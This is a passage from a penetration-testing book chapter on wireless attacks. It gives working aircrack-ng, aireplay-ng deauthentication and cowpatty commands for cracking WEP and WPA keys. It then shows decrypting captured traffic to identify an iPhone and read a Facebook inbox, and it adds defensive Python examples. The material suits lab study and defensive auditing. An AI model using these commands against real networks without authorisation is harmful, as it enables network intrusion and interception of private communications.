is exactly the same: a dictionary attack. To be able to recover the passphrase on a WPA network, it's necessary to have a dictionary file that contains the passphrase of the network being tested. So the next question could be, where would someone get a decent password dictionary to start with? A great starting point would be at the www.offensive-security.com/wpa-tables website. This site contains a 49 million WPA-optimized password dictionary file that can be downloaded for free. What's meant by WPA optimized is that WPA requires a passphrase to be at least eight characters. So this file only contains passwords of at least eight characters. This file has been used to create the WPA rainbow tables that can also be downloaded from that page. We'll discuss more about WPA rainbow tables in a later section. 

The first thing we need to do is identify information about the network that we are going to be testing. To do this, execute airodump-ng wlan0. From the next screenshot we can see that we have the information we need to target the service set identifier (SSID) realiteechk. We have the channel, MAC or basic service set identifier (BSSID) of the access point, the security settings of the WPA2 preshared key, and advanced encryption standard (AES) encryption. At the bottom of the screen we can see what client is currently connected to that access point. 


[Screenshot: airodump-ng wlan0 output in a Konsole shell, listing the realiteechk access point with its channel, BSSID and ENC/CIPHER/AUTH columns, and the connected station at the bottom.] 

We can now take this information to create a more focused and directed command. Notice 
how the command switches coincide with the output in the screenshot. To begin capturing data 
for only that SSID we execute the following command: 


airodump-ng --channel 1 --bssid 00:14:BF:20:90:37 wlan0 -w file 


We want to keep this window running so we can capture the handshake when the client connects to the access point. In WPA, a capture file with the handshake is all that’s needed to be able to launch the dictionary attack. 

There’s no way to tell how long it may take for the workstation to disconnect then reconnect to the access point on its own. So we are going to help move the process along by knocking the workstation off the network using aireplay-ng. The good news about wireless devices is they will automatically reconnect. To do this, open another terminal window and type aireplay-ng --help to view the syntax and options that are available. In looking at the options, we can see that we want to use the replay option -a to set the BSSID, the -c to set the destination MAC, and the -0 to specify the deauthentication (deauth) type of attack. The full command would be 


aireplay-ng -0 5 -a 00:14:BF:20:90:37 -c 00:13:CE:45:24:D6 wlan0 


The number 5 in the command specifies the number of deauth packets to send. If this number is omitted, aireplay-ng will continually send deauth packets. Therefore, the client would not be able to reconnect to the access point (AP) until this command was manually stopped. The following screenshot shows an example of the output of this command. 


[Screenshot: aireplay-ng deauthentication output in a Konsole shell.] 


Watch the client workstation as this command is executed. You should notice that almost 
instantly the client workstation will lose its connection to the AP. Now go back to the airodump-ng 
terminal and watch in the upper right-hand corner. When airodump-ng captures a complete 
handshake, it will display the BSSID for which it was captured. Verify that the BSSID is for the 
network you are testing. 
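What the deauthentication step above looks like to someone monitoring the channel for abuse, as an added example that is not code from the book: a short Python parser for raw 802.11 management frames that counts deauthentication frames per BSSID inside a sliding window and flags a burst. The frames and timestamps are constructed sample data; the MAC addresses reuse the ones from this chapter's aireplay-ng command, and parse_header, build_deauth and DeauthDetector are names chosen here.

```python
"""Spotting a deauthentication burst in raw 802.11 management frames.

Added example, not code from the book. Deauthentication frames are
management frames (type 0) with subtype 12. A wireless IDS counts them per
BSSID over a short window: a burst like the one aireplay-ng -0 produces trips
the threshold, while a single legitimate deauth does not.
All frames below are constructed sample data.
"""
import struct
from collections import defaultdict, deque

MGMT_TYPE = 0
DEAUTH_SUBTYPE = 12          # subtype 1100b: deauthentication


def mac_bytes(text):
    """'00:14:bf:20:90:37' -> 6 raw bytes."""
    return bytes.fromhex(text.replace(":", ""))


def parse_header(frame):
    """Decode frame control and the three address fields of an 802.11 frame."""
    if len(frame) < 24:
        raise ValueError("frame shorter than an 802.11 MAC header")
    fc0 = frame[0]                          # first frame-control byte
    info = {
        "type": (fc0 >> 2) & 0x3,           # bits 2-3
        "subtype": (fc0 >> 4) & 0xF,        # bits 4-7
        "dst": frame[4:10].hex(":"),        # addr1 (receiver)
        "src": frame[10:16].hex(":"),       # addr2 (transmitter)
        "bssid": frame[16:22].hex(":"),     # addr3 (BSSID in management frames)
    }
    if info["type"] == MGMT_TYPE and info["subtype"] == DEAUTH_SUBTYPE and len(frame) >= 26:
        # The deauthentication body is a 2-byte little-endian reason code.
        info["reason"] = struct.unpack_from("<H", frame, 24)[0]
    return info


def build_deauth(dst, src, bssid, reason=7):
    """Construct a deauth frame for the sample data (reason 7: class 3 frame from non-associated STA)."""
    frame_control = bytes([(DEAUTH_SUBTYPE << 4) | (MGMT_TYPE << 2), 0x00])
    duration = b"\x3a\x01"
    seq_ctrl = b"\x00\x00"
    return (frame_control + duration + mac_bytes(dst) + mac_bytes(src)
            + mac_bytes(bssid) + seq_ctrl + struct.pack("<H", reason))


class DeauthDetector:
    """Flag a BSSID once `threshold` deauth frames are seen within `window_s` seconds."""

    def __init__(self, window_s=1.0, threshold=5):
        self.window_s = window_s
        self.threshold = threshold
        self.seen = defaultdict(deque)      # bssid -> timestamps of recent deauths

    def feed(self, ts, frame):
        """Return an alert string for this frame, or None."""
        h = parse_header(frame)
        if h["type"] != MGMT_TYPE or h["subtype"] != DEAUTH_SUBTYPE:
            return None
        q = self.seen[h["bssid"]]
        q.append(ts)
        while q and ts - q[0] > self.window_s:   # drop frames that fell out of the window
            q.popleft()
        if len(q) >= self.threshold:
            return (f"deauth burst: {len(q)} frames in {self.window_s}s for BSSID "
                    f"{h['bssid']} (last one {h['src']} -> {h['dst']}, reason {h['reason']})")
        return None


def scan(timed_frames, window_s=1.0, threshold=5):
    """Run the detector over (timestamp, frame) pairs and collect the alerts."""
    det = DeauthDetector(window_s, threshold)
    alerts = []
    for ts, frame in timed_frames:
        alert = det.feed(ts, frame)
        if alert:
            alerts.append(alert)
    return alerts


AP = "00:14:bf:20:90:37"       # BSSID from the chapter's example (lowercase here)
CLIENT = "00:13:ce:45:24:d6"   # client MAC from the chapter's example

# Constructed sample: six deauths spoofed from the AP to the client, 100 ms apart
# (the shape of an aireplay-ng -0 run), then one lone deauth from a different AP.
BURST = [(i * 0.1, build_deauth(CLIENT, AP, AP)) for i in range(6)]
LONE = [(30.0, build_deauth(CLIENT, "00:11:22:33:44:55", "00:11:22:33:44:55"))]

if __name__ == "__main__":
    for line in scan(BURST + LONE):
        print(line)
```

The burst produces two alerts (frames five and six both exceed the threshold) and the lone deauth produces none.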
If capturing the handshake is unsuccessful the first time, repeat the same command. There are many factors that could come into play, such as range, interference, and others. Also make sure the client is automatically connecting. Sometimes, if too many deauth packets are transmitted at once it may take longer for the client to reconnect, or it may not reconnect at all. The next step is to use aircrack-ng to process a password dictionary file against the capture file(s). For our testing purposes we are going to be testing with the small sample dictionary file located at /pentest/wireless/cowpatty/dict: 


aircrack-ng -e realiteechk -w /pentest/wireless/cowpatty/dict file*.cap 


If we issue the command aircrack-ng --help we can see what the syntax means. The -e represents the ESSID, -w designates the path to the “dict” password dictionary file, and the file*.cap says which capture files to analyze. The “*” is used in case there are multiple capture files. The following screenshot displays the final results and shows that the password was successfully found. 


[Screenshot: aircrack-ng output in Konsole (Shell No. 3) showing KEY FOUND! [ changeme ].] 


Wireless Hacking ■ 365 


Note (frustration reducer): When testing these scenarios in your lab, there may be instances 
when you are very sure you are doing the right thing, but the result is always a fail. One thing to 
check is to make sure that not all your equipment is sitting right next to each other, such as on the 
same small desk. For example, if you aren't able to capture the handshake, try moving the client 
machine across the room away from your BackTrack capture system. 


Wired Equivalent Privacy Cracking 


Even though wired equivalent privacy (WEP) is older and easily defeated, you will still find it in use. To crack WEP, begin by identifying the channel of the target network using WEP encryption. To do this, type airodump-ng wlan0. 


In this case, the channel is 5, so the device should be set to channel 5 by typing: 
iwconfig wlan0 mode monitor channel 5 


To verify that the device is listening on channel 5, type iwconfig wlan0. 


To capture wireless traffic on channel 5 and write the captured data to a file called "file," type 
airodump-ng wlan0 -c 5 -w file 
If there are connected clients you will see their MAC addresses listed under the Station column. 


[Screenshot: airodump-ng output listing the USINGWEP access point with its ENC and AUTH columns and the connected station.] 


00:03:F4:D1:3D:02 is the MAC address connected to the AP named USINGWEP (00:1C:10:BC:9F:7B). To crack WEP, you will need to generate enough initialization vectors by using a replay attack. Open a new terminal and type 


aireplay-ng -3 -b 00:1C:10:BC:9F:7B -h 00:03:F4:D1:3D:02 wlan0 


When you start, you will likely see zero ARP requests. In order to increase this number, perform a deauthentication attack to knock the station off the wireless network for a second. To do this, open another terminal window and type 


aireplay-ng -0 1 -a 00:1C:10:BC:9F:7B -c 00:03:F4:D1:3D:02 wlan0 


The number of ARP requests needs to increase significantly (should be in the hundreds or 
thousands). If it does not work, try another deauthentication attack. Repeat until ARPs increase. 


Once you have a decent amount of ARPs, you may start using the aircrack-ng tool. To do this, 
type aircrack-ng file*.cap. Select the network you are targeting from the list. 


[Screenshot: aircrack-ng output with the USINGWEP network selected and the recovered WEP key reported as found.] 


Once you have the key, you can connect to the network (if you have permission from the 
owner). 


Wi-Fi Monitoring and Capturing 


To be able to successfully capture the intended Wi-Fi traffic, it’s important to understand how 
the Wi-Fi security settings will affect capturing the data. The actual technologies behind these 
security settings are outside the scope of this book, but there are still important considerations 
to be aware of depending on the security configurations set on the access point (AP). An open 
access point doesn't have any security enabled and transmits all data in the clear. In this instance 
anyone can connect to the access point without needing to input a password. Therefore, anyone within range that has the capability to monitor wireless transmissions will be able to view all the associated network data. 

An access point that has its wireless security settings configured to use WEP encryption takes 
a little bit more information to be able to view. One primary thing to note about WEP is that all 
the data is encrypted using the same key. This plays a major role when capturing WEP encrypted 
data because this means that all traffic using that key can be decrypted, even all other devices 
connected to the access point. One way to be able to decrypt the traffic is to configure the IEEE 
802.11 preferences in Wireshark. Notice the option Enable decryption and the area to input the 
key used to encrypt the traffic. 


[Screenshot: Wireshark Preferences (Profile: Default), IEEE 802.11 wireless LAN section. Options shown: Reassemble fragmented 802.11 datagrams; Ignore vendor-specific HT elements; Call subdissector for retransmitted 802.11 frames; Assume packets have FCS; Ignore the Protection bit (No / Yes - without IV / Yes - with IV); Enable decryption (checked). Key examples: 01:02:03:04:05 (40/64-bit WEP), 010203040506070809101111213 (104/128-bit WEP), wpa-pwd:MyPassword[:MyAP] (WPA + plaintext password [+ SSID]), wpa-psk:0102030405...6061626364 (WPA + 256-bit key). Invalid keys will be ignored. Keys entered: wpa-pwd:myhardpassword:Sparta, 11:22:33:44:55 and a second short WEP key.] 


This software allows for the ability to view the encrypted traffic by inputting the required keys. The key(s) will be applied to each frame in the capture and will decrypt any frame possible and therefore successfully decrypt the traffic, allowing it to be viewed in clear text. 


Note: The original capture file is not being altered in any way when inputting the key(s) into 
Wireshark. The Wireshark application is only applying the keys to each frame in the capture file 
so the user can view the decrypted traffic. 


When working with traffic that is encrypted with WPA/WPA2 there are some other important considerations of which to be aware. The primary thing to keep in mind is that traffic for each device is encrypted separately from the point at which that device authenticates to the network. This is important because it means that the actual authentication (called the handshake) needs to be captured as well so the traffic after that point can be successfully decrypted. This is much different than WEP traffic since WEP traffic can be decrypted from the point in which the network capture is initiated, whereas WPA/WPA2 traffic can only be decrypted from the point at which the device successfully authenticates to the network. 

The next screenshot illustrates an example of WPA-encrypted traffic being decrypted with 
Wireshark. Notice that the first frame being displayed is frame number 1261. This means that other 
traffic has been captured but the only frames that have been decrypted are from the point where the 
authentication (Extensible Authentication Protocol [EAPOL] frames) has been captured. The “eapol 
|| ip” display filter has been applied to show the authentication frames and the frames that contain an 
IP address. IP addresses will not be shown unless the frame has been successfully decrypted. 
[Screenshot: Sparta-WPA-01.cap open in Wireshark with the display filter "eapol || ip". The first displayed frames are 1261, 1263 and 1265 (EAPOL Key, between 00:23:6c:32:32:42 and 00:22:6b:8c:a8:b3), followed by 1269 DHCP Request and 1272 DHCP ACK (192.168.50.1 to 192.168.50.137, Transaction ID 0xf5379210), then MDNS, SSDP, DNS and TCP traffic from 192.168.50.137. The detail pane shows frame 1261 (153 bytes) as IEEE 802.11 Data / Logical-Link Control / 802.1X Authentication, Version: 2, Type: Key (3). Status bar: File "/root/Sparta-WPA-01.cap", Packets: 161652, Displayed: 166.] 


Since WPA/WPA2 can only be decrypted from the point when the device authenticates to the network, it could be useful to know that it is possible to force a device to reauthenticate. This can be done by using a utility in BackTrack called aireplay-ng with the “-0” (dash zero) option to force the device to deauthenticate from the network therefore causing the device to need to reauthenticate. The next screenshot shows an example of a successful deauthentication. 

Here are some of the available switches for aireplay-ng: 


■ -0 = deauth mode 
■ 1 = send one deauth frame 
■ -a = the MAC address of the access point 
■ -c = client MAC address 
■ wlan0 = network device to use to transmit frame 


[Screenshot: aireplay-ng -0 1 deauthentication output in Konsole (Shell No. 3).] 


Wireshark can decrypt WEP, WPA, and even WPA2 traffic. Another utility that can be used for either WEP or WPA/WPA2 decryption is airdecap-ng. This utility takes the user input, applies it to the frames in a capture file, and creates a new output file that only contains the successfully decrypted frames. In this instance, the new capture file can be opened and analyzed with Wireshark without the need to input any keys into the Wireshark preferences. 

The next screenshot shows an example of using airdecap-ng to decrypt the WEP traffic in the WEP-Sparta.cap network capture file. Notice it displays information about how many packets were able to be decrypted with the given information. Also notice that a new file, WEP-Sparta-dec.pcap, has been created that only contains the traffic that has been successfully decrypted. This could make the analysis much more efficient because we are now only dealing with the packets that we are interested in and not all the other network noise. 

Here are some of the options that can be utilized for airdecap-ng: 


■ -l = don't remove 802.11 header 
■ -b = MAC address of access point 
■ -w = WEP key 


[Screenshot: airdecap-ng run against WEP-Sparta.cap in Konsole (Shell No. 2, ~/Captures).] 


It's also important to keep in mind that when capturing Wi-Fi traffic there are several uncontrollable factors, such as interference from microwaves, wireless phones, baby monitors, and so on, that could have a negative effect on the success of capturing the data. It's not unusual to capture wireless traffic that is not 100% complete. As shown in the next screenshot, Wireshark will point out where and how much data is missing. These small missing pieces in the capture may not always hinder the analysis, but it can be a much larger issue when it comes to actually extracting data files from the capture. For example, if 100% of an image is captured then it can be extracted and the hash of the extracted file will match the file downloaded to the receiving device. If a single byte isn't successfully captured then the hashes will not match. In the case of the image file, the image may be able to be opened and viewed but there may be some sort of artifacts that aren't in the original file. This could be a line through the image, parts or pieces missing, and so on. It is scientifically impossible to guarantee that every single byte of the Wi-Fi network traffic is successfully captured. Knowing and understanding this could prove to be vital in some circumstances. If someone wanted to argue the point that there was something wrong with the capture procedure since there are bytes missing, then this could be correctly explained. 


[Screenshot: Wireshark Follow TCP Stream dialog. The stream content is interrupted by markers such as "[245 bytes missing in capture file]", "[148 bytes missing in capture file]" and "[37 bytes missing in capture file]". Entire conversation (540 bytes).] 
We have discussed several different things to be aware of when capturing Wi-Fi traffic for various security settings. One thing to notice is that if we know what the key or passphrase is then we are able to decrypt the traffic for analysis. Next we will take a look at some of the information that can be extracted from that decrypted network traffic. 


Physical Wi-Fi Device Identification 


One of the most important aspects of targeting a device is the ability to identify the type of device it 
actually is. Different devices work on the network in different ways with different capabilities. Whether 
you're an expert on a particular device or not, the network traffic will help determine what type of 
device it is. Analyzing the network traffic allows us to view two important pieces of device identifying 
information: the device name and device MAC address. Luckily, it's very easy to find this information. 

In this example, we are going to be targeting an iPhone connected to a wireless access point. 
To be able to discover what the name of the device on the network is we can take a look at the 
multicast domain name system (MDNS) traffic. MDNS is a technology developed by Apple and is 
used by the iPhone to help make networking devices together easier for the user. It is very similar 
to the standard DNS protocol, where its purpose is to resolve a computer or device name to an IP 
address, but acts in a slightly different way. This technology works by each device keeping its own 
records of devices on the network instead of relying on a dedicated device to answer client DNS 
requests. For this to be able to work one of the first things the device must do is to poll the network 
for a list of devices on the network that support MDNS. 

In the next screenshot we can see an example of the MDNS frame. A query is sent to the 
multicast IP address 224.0.0.251 on port 5353 seeking records from other MDNS capable devices 
to build the local list. This frame will also contain the actual device name as shown in the Info 
column: RealiTeeCHK.local. 


[Screenshot: WEP-Sparta-dec.pcap open in Wireshark. The packet list shows MDNS Standard query frames from 192.168.50.137 and an ARP "Who has 169.254.255.255? Tell 192.168.50..." broadcast. The detail pane expands the MDNS frame: Queries: RealiTeeCHK.local, type ANY, class IN, "QU" question (Type: ANY (Request for all records); Class: IN (0x0001); "QU" question: True). Authoritative nameservers: RealiTeeCHK.local, type A, class IN, addr 192.168.50.137 (Cache flush: False; Time to live: 2 minutes). Status bar: Packets: 1592, Displayed: 1592.] 
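The MDNS probe shown in the screenshot, parsed from the raw UDP payload, as an added example that is not code from the book. The packet is constructed here to match the screenshot (RealiTeeCHK.local, type ANY with the QU bit set, and the A record 192.168.50.137 in the authority section); parse_mdns, device_names and build_probe are names chosen for this example.

```python
"""Reading a device name out of an mDNS packet.

Added example, not code from the book. Multicast DNS uses the DNS wire
format on UDP port 5353 to the group 224.0.0.251. The parser below decodes
the header, the question section and every resource record, handling name
compression, so the host name a device puts in its mDNS probe and the
address it claims can be read straight out of a capture. The sample packet
is constructed to match the chapter's screenshot.
"""
import struct

TYPE_A, TYPE_ANY = 1, 255
CLASS_IN = 1


def _read_name(buf, off):
    """Decode a possibly compressed DNS name; return (name, offset after it)."""
    labels, end, jumped = [], None, False
    while True:
        length = buf[off]
        if length & 0xC0 == 0xC0:                       # 11xxxxxx: compression pointer
            pointer = struct.unpack_from("!H", buf, off)[0] & 0x3FFF
            if not jumped:
                end = off + 2                           # the name ends after the first pointer
            jumped = True
            off = pointer
            continue
        off += 1
        if length == 0:
            break
        labels.append(buf[off:off + length].decode("ascii"))
        off += length
    return ".".join(labels), (end if jumped else off)


def parse_mdns(payload):
    """Parse header, questions and all resource records of one mDNS packet."""
    txid, flags, qd, an, ns, ar = struct.unpack_from("!6H", payload, 0)
    off = 12
    questions, records = [], []
    for _ in range(qd):
        name, off = _read_name(payload, off)
        qtype, qclass = struct.unpack_from("!HH", payload, off)
        off += 4
        questions.append({"name": name, "type": qtype,
                          "class": qclass & 0x7FFF,
                          "qu": bool(qclass & 0x8000)})        # unicast-response ("QU") bit
    for _ in range(an + ns + ar):
        name, off = _read_name(payload, off)
        rtype, rclass, ttl, rdlen = struct.unpack_from("!HHIH", payload, off)
        off += 10
        rdata = payload[off:off + rdlen]
        off += rdlen
        rec = {"name": name, "type": rtype, "class": rclass & 0x7FFF,
               "cache_flush": bool(rclass & 0x8000), "ttl": ttl}
        if rtype == TYPE_A and rdlen == 4:
            rec["addr"] = ".".join(str(b) for b in rdata)
        records.append(rec)
    return {"id": txid, "response": bool(flags & 0x8000),
            "questions": questions, "records": records}


def device_names(payload):
    """Every host name the packet probes for or announces, for the analyst's inventory."""
    p = parse_mdns(payload)
    names = {q["name"] for q in p["questions"]} | {r["name"] for r in p["records"]}
    return sorted(names)


def _encode_name(name):
    return b"".join(bytes([len(label)]) + label.encode("ascii")
                    for label in name.split(".")) + b"\x00"


def build_probe(name, addr, ttl=120):
    """Construct an mDNS probe of the kind the iPhone sends: a question of type ANY
    with the QU bit, plus the proposed A record in the authority section."""
    header = struct.pack("!6H", 0, 0, 1, 0, 1, 0)        # id 0, query, 1 question, 1 authority
    question = _encode_name(name) + struct.pack("!HH", TYPE_ANY, CLASS_IN | 0x8000)
    authority = (b"\xC0\x0C"                              # pointer to the name at offset 12
                 + struct.pack("!HHIH", TYPE_A, CLASS_IN, ttl, 4)
                 + bytes(int(o) for o in addr.split(".")))
    return header + question + authority


# Constructed sample matching the chapter's MDNS frame.
SAMPLE_PROBE = build_probe("RealiTeeCHK.local", "192.168.50.137")

if __name__ == "__main__":
    parsed = parse_mdns(SAMPLE_PROBE)
    print(device_names(SAMPLE_PROBE))
    print(parsed["questions"][0])
    print(parsed["records"][0])
```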
This device name, for this particular device, is the name of the iPhone. The iPhone name 
can be configured simply by using iTunes. In the next screenshot we can see the name of the 
device shown in the Summary tab and under Devices in the Navigation pane. By clicking on 
the device name it will allow the user to rename the iPhone from the default name. Anything 
other than the default name makes it that much easier to identify a single device from any 
other device. 


[Screenshot: iTunes with the iPhone selected under Devices in the navigation pane. The Summary tab shows the device name, Capacity: 7.08 GB, Software Version: 3.1.3, and the Serial Number and Phone Number fields redacted, along with the Check for Update and Restore buttons.] 


The next, and probably most important, piece of identifying information is the device MAC 
address. The MAC address is a hard-coded address that is applied to the network card during 
manufacturing. Any device that communicates on the network will need to have a unique address 
on that network and it will be included in every frame that is sent over the network. If we take 
another look at the screenshot of the MDNS frame, we can see an ARP request broadcast and in 
the Source column the MAC address is displayed. The MAC address can be found in the Wi-Fi 
address field in the iPhone by navigating to Settings > General > About. This information can be 
compared to the information in the capture file to positively identify the device that conducted 
the network communication. 

There is one major thing to keep in mind when relying on the MAC address. It is possible to 
change or spoof the MAC address. If the MAC address is being changed on a regular basis then it 
could add a level of difficulty to capturing its data, but will not make it impossible. 


WPA Rainbow Tables 


Cowpatty can be used in conjunction with a dictionary and capture file that contains the handshake, but the problem is that it could possibly take a very long time to process and test the entire 
dictionary file. Thanks to RenderMan, and the help of some other very smart and motivated 
people, there is another way to blow through the dictionary list. Even if the passphrase isn’t in 
the list, you can get to that result much faster. More technical details about what processes are 
taking place with WPA-PSK rainbow tables can be found at www.renderlab.net. We are going to 
concentrate more on how to use the rainbow table utilities. 

The important thing to remember about the WPA-PSK rainbow tables is that the tables need to be created for each and every SSID that it will be run against. Therefore, if a person is going to audit an access point with the SSID of “crackme,” then a rainbow table would need to be generated specifically for that SSID. This can be done with the genpmk utility located at /pentest/wireless/cowpatty on the BackTrack Linux distribution. This example will use the small dictionary file already located in the distribution called dict. To run genpmk to create the rainbow table for the SSID linksys, type 


genpmk -f dict -s linksys -d rt-linksys 


This command will create the rainbow table called rt-linksys using the dict dictionary file for 
the SSID of linksys. 

Keep in mind that the hacker will need to capture wireless traffic that contains the authentication process. The deauth technique can be used to force the system to reauthenticate while running airodump-ng to capture the authentication frames. Once the handshake process is captured to a pcap format, and the rainbow table has been generated, the hacker can then launch the attack against that capture file to attempt to recover the passphrase. This is done using the cowpatty utility. To launch the attack, type 


cowpatty -d rt-linksys -s linksys -r wpapsk-linksys.dump 


If the passphrase was contained in the dictionary used to create the rainbow table file, then it 
will display the correct passphrase to the hacker. 


[Screenshot: Konsole, root@bt:/pentest/wireless/cowpatty] 

    root@bt:/pentest/wireless/cowpatty# cowpatty -d rt-linksys -s linksys -r wpapsk-linksys.dump 
    cowpatty 4.6 - WPA-PSK dictionary attack. <jwright@hasborg.com> 

    Collected all necessary data to mount crack against WPA/PSK passphrase. 
    Starting dictionary attack. Please be patient. 

    The PSK is "dictionary". 

    3740 passphrases tested in 0.11 seconds: 34782.61 passphrases/second 
    root@bt:/pentest/wireless/cowpatty# 


To get an idea of the speed improvements that using rainbow tables provides, using cowpatty 
with the dictionary processed about 229.80 passphrases per second; using the rainbow tables 
processes approximately 34,782.61 passphrases per second. Also, after the rainbow table has been 
created the first time for a particular SSID, it can be reused against other access points that use 
that same SSID. To potentially save a massive amount of CPU cycles, many precomputed WPA-PSK rainbow tables for the most common SSIDs have already been created and can be freely downloaded by anyone from www.offensive-security.com/wpa-tables. 

In a final thought, if you already know what the passphrase is and you have downloaded the 
49 million WPA-optimized word dictionary file from offensive-security.com, then you are not 
required to go through all the steps of capturing the handshake, generating the rainbow table, and 
so on. To see if your passphrase is contained in the dictionary file, in BackTrack type: 


cat <wordlist dictionary file> | grep <your passphrase> 


This will look for your passphrase inside the dictionary file. If it’s found, then you know that someone would be able to quickly retrieve your password using this source. 
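Why genpmk has to build a separate table for every SSID, and the passphrase check above done as an exact match instead of a substring grep, as an added example that is not code from the book: WPA's pairwise master key is PBKDF2-HMAC-SHA1 over the passphrase with the SSID as the salt, which the code computes directly with the standard library. The wordlist is constructed, and wpa_pmk, build_pmk_table, table_valid_for and the other function names are chosen here.

```python
"""WPA-PSK key derivation, per-SSID rainbow tables, and a passphrase audit.

Added example, not code from the book. WPA/WPA2-Personal derives the
256-bit pairwise master key (PMK, also called the PSK) as
PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations). The SSID is the salt,
so a table of precomputed PMKs is only valid for the SSID it was built
with. The wordlist, SSIDs and passphrases below are constructed samples.
"""
import hashlib
import hmac

ITERATIONS = 4096
PMK_LEN = 32


def wpa_pmk(passphrase, ssid):
    """PMK per IEEE 802.11i; rejects passphrases outside the 8-63 character range WPA allows."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrase must be 8 to 63 characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), ITERATIONS, PMK_LEN)


def build_pmk_table(words, ssid):
    """Precompute the PMK of each candidate for one SSID (the expensive step genpmk front-loads)."""
    return {w: wpa_pmk(w, ssid) for w in words if 8 <= len(w) <= 63}


def table_valid_for(table, ssid):
    """True only if every PMK in the table is the derivation for `ssid`, i.e. the table was built for it."""
    return all(hmac.compare_digest(pmk, wpa_pmk(word, ssid)) for word, pmk in table.items())


def passphrase_in_wordlist(passphrase, lines):
    """Exact-line match: is this passphrase literally in the wordlist?"""
    return any(line.rstrip("\r\n") == passphrase for line in lines)


def grep_style_match(passphrase, lines):
    """Substring match, which is what `grep <passphrase>` actually does: longer words also hit."""
    return any(passphrase in line for line in lines)


# Constructed wordlist: the two passphrases recovered in the chapter plus a few others.
WORDLIST = ["changeme\n", "dictionary\n", "password\n", "changeme123\n", "linksys1\n"]

if __name__ == "__main__":
    table = build_pmk_table([w.strip() for w in WORDLIST], "linksys")
    print("PMK for dictionary/linksys:", table["dictionary"].hex())
    print("table built for linksys valid for crackme:", table_valid_for(table, "crackme"))
    print("changeme1 exact:", passphrase_in_wordlist("changeme1", WORDLIST),
          "grep:", grep_style_match("changeme1", WORDLIST))
```

The grep-style check reports changeme1 as present because it is a substring of changeme123; the exact check does not.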


Analyzing Wi-Fi Network Traffic 


In this chapter we've discussed some of the tools and methodologies for working with Wi-Fi 
technology. In this section we are going to use the methods previously discussed to analyze the 
data transmissions from a popular device, the iPhone. The iPhone, like many other available 
devices, has built-in Wi-Fi capabilities. The first question that may come up is, why are we 
using the iPhone in our examples? Simply because it's currently a popular device and, probably 
most importantly, because many people may not realize the security implications associated with 
using this type of device. Most people are only concerned about whether or not a device is 
functioning properly and aren't fully aware of what type of information is actually being 
transmitted when it is in use. Therefore, we are going to discuss some of the different types of 
information that are exposed when analyzing the network traffic of the iPhone. Of course, these 
same techniques can be used for any other type of device as well. 


Network Analysis 


The next thing we are going to do is examine a network capture file that has already been 
captured using the previous techniques. This capture file contains several different types of traffic 
generated by using the iPhone over the Wi-Fi connection. We want to see what types of information 
included in the capture file are transmitted in the clear, so that we can see the content. 
When examining the capture file it's important to keep in mind that a lot of the data may be 
transmitted encrypted. As time moves forward, more and more applications are beginning to 
encrypt their transmissions. In these instances we may not be able to view the content, but 
sometimes it can be just as interesting to know that the connections took place at all. 

The first thing to keep in mind is that there is no single way, set in stone, to conduct the 
analysis of network traffic. There are many technologies and applications that transmit data in 
different ways. Depending on the type of data contained in the capture file, you may need to 
research how that protocol, application, or website processes information. For example, web traffic 
is transmitted over HTTP, and websites are built using many hyperlinks and scripts that may link 
to other websites. Therefore, just because a particular domain name or IP address is found in the 
capture file, we can't assume that it was an action specifically and purposely executed by the user. 

There are a couple of things I like to do first when starting to examine a capture file. The first 
thing to do after opening the capture file is to take a look at the protocol hierarchy statistics found 
under Statistics > Protocol Hierarchy in Wireshark. This gives a decent idea of the different types 
of information contained in the file. As we can see from the next screenshot, there is a decent 
amount of HTTP traffic. Under the Hypertext Transfer Protocol section we can see several 
different types of HTTP traffic, and any entry can be used to create a display filter that includes or 
excludes that data type in the main Wireshark view by right-clicking the field and choosing the 
desired option. For example, "Line-based text data" converts to the display filter "data-text-lines", 
which reassembles multiple segments into a single view that can be analyzed more easily. 
Wireshark: Protocol Hierarchy Statistics 

Display filter: none 

Protocol                              % Packets  Packets  Bytes     Mbit/s  End Packets  End Bytes  End Mbit/s 
Frame                                 100.00%    18205    14291144  0.052   0            0          0.000 
  IEEE 802.11 wireless LAN            100.00%    18205    14291144  0.052   0            0          0.000 
    Logical-Link Control              100.00%    18205    14291144  0.052   0            0          0.000 
      Internet Protocol               99.28%     18074    14282186  0.052   0            0          0.000 
        Transmission Control Protocol 98.29%     17893    14258013  0.052   11804        5461230    0.020 
          Hypertext Transfer Protocol 31.84%     5796     8409000   0.030   5754         8371607    0.030 
            Line-based text data      0.06%      11       8006      0.000   11           8006       0.000 
            Portable Network Graphics 0.02%      3        1407      0.000   3            1407       0.000 
            MIME Multipart Media Encapsulation 0.08% 14   11514     0.000   14           11514      0.000 
            JPEG File Interchange Format 0.05%   10       10641     0.000   10           10641      0.000 
            Compuserve GIF            0.01%      1        1455      0.000   1            1455       0.000 
            eXtensible Markup Language 0.01%     1        1306      0.000   1            1306       0.000 
            Malformed Packet          0.01%      2        3064      0.000   2            3064       0.000 
          Secure Socket Layer         1.61%      293      387783    0.001   293          387783     0.001 
        User Datagram Protocol        0.96%      175      23765     0.000   0            0          0.000 
          Domain Name Service         0.69%      126      14507     0.000   126          14507      0.000 
          NetBIOS Datagram Service    0.04%      7        1638      0.000   0            0          0.000 
          NetBIOS Name Service        0.16%      30       3300      0.000   30           3300       0.000 


As we can see from the next screenshot, when we apply the "data-text-lines" display filter a 
different type of data is uncovered. Now we are able to view streams that Wireshark has identified 
as type text/html and text/plain. When frame number 3534 is selected, the details of that segment 
are displayed in the middle pane and we can see which frames make up that segment: frame 3533 
and frame 3534 in this example. Next, we highlight the last line in the middle pane, which causes 
some additional tabs to be displayed in the bottom pane. By selecting the "Uncompressed entity 
body" tab at the bottom, we can begin to see the data in a human-readable format. In this example 
we are viewing some results from the Facebook inbox: we can see that there are six new unread 
messages, the subject line, and the beginning of each message. We can then continue on through 
this view of the capture to see what other information can be discovered. 


[Screenshot: Wireshark, iphone-wep-01-dec.cap, display filter data-text-lines. The packet list shows 
HTTP/1.1 200 OK responses of type text/html and text/plain from m.facebook.com and 69.63.178.x 
to iPhone.local (frames 3534, 3566, 3583, 3609, 3670). With frame 3534 selected, the bottom pane 
offers the tabs Frame (1023 bytes), Reassembled TCP (2387 bytes) and Uncompressed entity body 
(4615 bytes); the last shows a mailbox XML document (<?xml version="1.0" encoding=... 
<mailbox ... total="17"><thread tid="..." ...>). Status bar: Packets: 18205 Displayed: 11 Marked: 0.] 
